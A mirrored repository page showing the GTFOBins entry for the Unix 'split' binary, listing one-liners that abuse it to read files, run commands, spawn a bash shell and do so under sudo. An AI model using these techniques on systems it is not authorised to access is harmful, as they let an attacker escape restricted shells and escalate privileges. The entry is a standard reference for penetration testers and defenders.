This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-07 04:05:04 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
6a6485c44b204e7cebb8ebeb93d8a353bf7692c9
GTFOBins.github.io
/
_gtfobins
/
split.md
Emanuel Duss
286775860a
Fixed syntax error
2020-11-13 12:46:01 +01:00
593 B
Raw
Blame
History
functions
functions
file-read
command
shell
sudo
code
LFILE=file_to_read TF=$(mktemp) split $LFILE $TF cat $TF*
description
code
Command execution using an existing or new created file.
COMMAND=id TF=$(mktemp) split --filter=$COMMAND $TF
description
code
Command execution using stdin (and close it directly).
COMMAND=id echo | split --filter=$COMMAND /dev/stdin
code
split --filter=bash /dev/stdin
code
split --filter=bash /dev/stdin
Reference in New Issue
View Git Blame
Copy Permalink